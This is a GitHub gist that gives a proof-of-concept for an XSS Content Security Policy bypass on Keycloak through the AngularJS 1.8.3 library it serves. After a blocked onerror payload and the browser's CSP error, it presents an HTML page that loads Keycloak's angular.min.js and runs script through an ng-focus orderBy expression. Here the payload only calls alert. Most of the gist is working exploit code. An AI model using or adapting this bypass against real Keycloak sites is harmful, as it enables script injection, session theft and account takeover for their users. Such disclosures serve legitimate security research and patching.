Skip to content

Instantly share code, notes, and snippets.

@Xib3rR4dAr

Xib3rR4dAr/keycloak_angular_js_1.8.3_xss_csp_bypass.md

Created November 17, 2024 20:53
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Xib3rR4dAr/b714400a939b39d4f2d4ba4a33d13eb8 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Xib3rR4dAr/b714400a939b39d4f2d4ba4a33d13eb8 to your computer and use it in GitHub Desktop.
Download ZIP
Keycloak AngularJS 1.8.3 XSS CSP bypass
Raw
keycloak_angular_js_1.8.3_xss_csp_bypass.md

blob://example.com/3dfab3bd-a892-4448-92c3-de92d8eed2ea

<img src=x onerror=alert(1)>

Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.

angular.min.js

/*
 AngularJS v1.8.3
 (c) 2010-2020 Google LLC. http://angularjs.org
 License: MIT
*/
(function(z)...

PoC:

<html>
<head> 
<meta charset="utf-8">
<script src="https://example.com/auth/resources/dm3bk/common/keycloak/node_modules/angular/angular.min.js"></script>
</head>
<body>
<div ng-app>
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([112233],alert)'">
</div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment